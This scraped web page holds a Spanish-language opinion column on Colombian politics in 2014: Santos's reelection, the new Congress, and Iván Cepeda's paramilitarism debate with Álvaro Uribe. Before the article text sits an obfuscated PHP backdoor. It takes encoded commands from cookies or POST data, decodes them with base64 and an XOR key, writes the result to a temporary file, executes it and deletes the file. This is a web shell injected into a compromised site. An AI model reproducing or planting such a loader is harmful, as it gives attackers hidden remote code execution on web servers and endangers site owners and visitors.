$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> ¿En qué va todo? – www.interferencechannel.com

¿En qué va todo?

IMG_0910 ok

La coyuntura política en Colombia ha llegado a generar una de las palpitaciones más bajas en cuanto a las votaciones para  Congreso y Presidencia, desde el 20 de Julio se generó una gran expectativa frente a lo que este Congreso representa, ya que vuelve al escenario político activo y de facto el Ex Presidente más Odiado y Amado de Inicios del Siglo en nuestro país, Álvaro Uribe Vélez, de esta manera y junto a él personajes de la talla de Navarro Wolf, Horacio Serpa, Viviane Morales, Ivan Cepeda, han generado gran expectativa, estos “cacaos” de la política, junto con los “Novatos” pero experimentados como el caso de Claudia López, desde el 20 de Julio desencadenaron lo que para muchos es un “Congreso Histórico”.

El 7 de Agosto, el Poder del País, quedo nuevamente en manos de Juan Manuel Santos Calderón, un Presidente con una visión de Estado de “centro” que él denomina como de “tercera vía” criticado por la manera en que se convirtió en cliché el tema de la “paz” con las FARC, y otros grupos guerrilleros, criticada por las crisis que el país vivió durante 4 años como la Educación y Justicia, así como también la crisis climática de la ola invernal del año 2010 y la sequía de 2014, muchos culpan de estas catástrofes al actual Presidente de la Republica, sin embargo, este quedo reelegido para 4 años más, ya que el tema de la paz aunque fue machacado hasta el cansancio es algo motivante para muchos colombianos y sectores que no desean más conflicto, más aun por postulas ideológicamente trilladas y fracasadas como el “socialismo del siglo XXI”, por la vía armada..

Este 17 de Septiembre pasado se llevó a cabo el debate de “control político” frente al paramilitarismo solicitado por Ivan Cepeda, donde las expectativas -en mi modo personal de ver-  se fueron disolviendo, lo que esperaba ser un debate prometedor frente a las problemáticas de fondo del paramilitarismo en Colombia, termino siendo una sacada de “trapitos al sol” entre ideologías políticas que finalmente en las metáforas irrespetuosas como “sanguijuela de alcantarilla” (Claudia López a Álvaro Uribe 17 de Septiembre de 2014) perdieron el Norte de la discusión, y mostraron un Congreso incapaz de fomentar la Paz de la que tanto se habló en campañas, un Congreso donde la “Gallardía” del Ex Presidente quedo anulada ante su salida apresurada a la Corte Suprema de Justicia, y sus respuesta  a las acusaciones y donde más que un Debate fue una “quejadera” sobre los que ostentan y ostentaron el Poder del Ejecutivo, donde el Ex Presidente Uribe ataco al Gobierno Santos, y el gabinete le paso cuentas de cobro sobre la persecución política de 8 años 2002-2010, donde Paloma Valencia defendió de forma casi Castro-Chavista al Ex Presidente Uribe, y parafraseo a continuación

“somos gente que cree en la Democracia y en los Principios y Valores de esta Republica que creo Simón Bolívar- (Chávez Frías?) y este debate que hoy humilla nuestra democracia solo es comparable con el debate horrible que le propiciara Santander al gran prócer de la Libertad Antonio Nariño, pero tampoco deben sentirse desamparados los Colombianos porque así como Bolívar (Chávez Frías?) salió de Bogotá Vituperado y amenazado, por quienes habían crecido en las esferas de la libertad que el propio Bolívar Construyo, la historia se encargó de (reivindicar) al prócer, como lo hará con Álvaro Uribe Vélez el Mejor Presidente de Colombia”

Cabe hacer la aclaración que respeto profundamente la Historia de Colombia a Bolívar, Santander y Nariño, y a Venezuela, es solo un símil-

Así pues el debate que tal vez tuvo mayor audiencia en mucho tiempo en Colombia, se convirtió en el campo de batalla no de ideas políticas para la construcción de un país en paz, sino de un ajuste de cuentas casi personales de los egos de la clase Política de Verdad, esos “cacaos” Ex Presidentes y Ex Constituyentes, y los escuderos a los que no se les ha oído la voz ni siquiera una vez en casi 2 meses de legislatura, como dirían los Feligreses seguidores del senador Robledo “¿Dónde está el Debate?”

En conclusión este periodo de Gobierno con German Vargas Lleras liderando en el gobierno desde la Vicepresidencia grandes ambiciones de mejora del país, principalmente en temas de infraestructura, fuera de la intención de la Presidencia en 2018, y del Presidente Juan Manuel Santos, como jefe de Estado mediador y conciliador, para la construcción de un país en Paz de “tercera vía” tienen la gran labor no solo de mejorar los caminos para dicha paz con los grupos armados, sino también de fomentar la paz entre los legisladores, para que las legislaturas no se pierdan en discusiones bizantinas, sino que esos honorarios se hagan valer, creando las condiciones para  leyes acordes a la realidad de nuestro país, a solucionar problemáticas de fondo, donde Roy haga valer con debates y acciones coherentes su curul, donde los 19 de Uribe generen ideas propositivas y no destructivas, bueno tal vez los 20 de Uribe contando a Robledo, que a estas alturas no se sabe si es chicha o es limonada, y así donde todos los Senadores, asistan a las plenarias no a atacar a Juan Manuel o a Vargas Lleras, ò a emprenderla contra Uribe, sino a crear las condiciones para que Colombia como Estado, Nación y Republica, tenga un camino más esperanzador y no se quede en las banderitas de Daniel Quintero Calle para que la paz que “ya viene” llegue desde las Instituciones, y quienes nos “representan” en ellas.

*Nicolás Muñoz Mora

Editor Político Interference Channel

 

Comments are closed.